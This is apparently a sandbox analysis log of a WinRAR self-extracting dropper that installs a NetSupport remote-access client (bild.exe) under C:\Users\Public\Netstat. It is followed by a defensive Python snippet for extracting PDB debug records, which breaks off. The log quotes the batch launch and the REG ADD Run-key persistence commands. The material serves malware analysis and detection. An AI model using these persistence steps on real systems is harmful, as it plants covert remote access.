Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D88BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat
Source: C:\Users\Public\Netstat\bild.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Command line argument: sfxname (0_2_00D8C131)
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Command line argument: sfxstime (0_2_00D8C131)
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Command line argument: STARTDLG (0_2_00D8C131)
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File read: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Source: unknown | Process created: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe
Source: unknown | Process created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
Source: unknown | Process created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
Source: unknown | Process created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcicl32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: shfolder.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcichek.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcicapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: mpr.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: version.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wininet.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: dbghelp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: dbgcore.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wtsapi32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: nsmtrace.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: nslsp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcihooks.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wbemcomn.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: winsta.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: amsi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: userenv.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: riched32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: riched20.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: usp10.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msls31.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pciinv.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: firewallapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: fwbase.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: iertutil.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: winhttp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: winnsi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: urlmon.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: srvcli.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: rasadhlp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcicl32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: shfolder.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcichek.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcicapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: mpr.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: version.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wininet.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wtsapi32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: nsmtrace.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: nslsp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcicl32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: shfolder.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcichek.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: pcicapi.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: mpr.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: version.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wsock32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wininet.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: netutils.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: samcli.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: wtsapi32.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: nsmtrace.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: nslsp.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Netstat\bild.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File written: C:\Users\Public\Netstat\client32.ini
Source: C:\Users\Public\Netstat\bild.exe | File opened: C:\Windows\SysWOW64\riched32.dll
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static file information: File size 2138135 > 1048576
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File opened: C:\Users\Public\Netstat\msvcr100.dll
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000005.00000002.4163625872.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000006.00000002.1828393967.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.1909924839.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000B.00000002.1989498636.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000005.00000002.4163937013.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000006.00000002.1828654414.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.1910320123.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000B.00000002.1989707601.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000005.00000002.4163812487.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000006.00000002.1828564621.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.1910207199.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000B.00000002.1989634737.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_5615000
Source: PCICL32.DLL.0.dr | Static PE information: section name: .hhshare
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8D8B6 push ecx; ret 0_2_00D8D8C9
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8CDF0 push eax; ret 0_2_00D8CE0E
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1116F055 push ecx; ret 5_2_1116F068
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11040E01 push 3BFFFFFEh; ret 5_2_11040E06
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C606BBF push ecx; ret 5_2_6C606BD2
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5F94C5 push ecx; ret 5_2_6C5F94D8
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5F8377 push 3BFFFFFFh; retf 5_2_6C5F837C
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5FE36C push edi; ret 5_2_6C5FE37B
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1116F055 push ecx; ret 6_2_1116F068
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11169F49 push ecx; ret 6_2_11169F5C
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11040E01 push 3BFFFFFEh; ret 6_2_11040E06
Source: msvcr100.dll.0.dr | Static PE information: section name: .text entropy: 6.909044922675825
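The PDB strings listed above come from the CodeView (RSDS) debug records embedded in the dropped binaries: bild.exe carries client32.pdb and the PCI*/HTCTL32/TCCTL32 DLLs carry paths under the same E:\nsmsrc\nsm\1210 build tree, while the outer dropper carries WinRAR's sfxrar.pdb. The Python below is an added illustration, not code from the Joe Sandbox report or from NetSupport, of how to pull such records out of a raw file or memory dump by scanning for the RSDS signature, so the same origin check can be run on a process dump without a full PE parser. The sample blob, the GUID inside it and the two classification prefixes are constructed for this example; the symbol-server key format (GUID followed by age, both in upper-case hex) is the standard Microsoft one.

```python
"""Extract CodeView (RSDS) debug records from a raw byte buffer.

Added example for triaging the PDB paths reported above; not part of the
sandbox report or of any NetSupport component.
"""
from __future__ import annotations

import re
import struct
import uuid
from dataclasses import dataclass

# Assumption for classification: paths seen in the report's PDB strings.
NETSUPPORT_BUILD_PREFIX = "e:\\nsmsrc\\nsm\\"
WINRAR_SFX_MARKER = "\\winrar\\sfx\\"


@dataclass
class CodeViewRecord:
    guid: uuid.UUID
    age: int
    pdb_path: str
    offset: int  # where the "RSDS" signature sits in the buffer

    @property
    def symbol_key(self) -> str:
        """Key used by symbol servers: <GUID hex, no dashes><age hex>, upper-case."""
        return f"{self.guid.hex.upper()}{self.age:X}"


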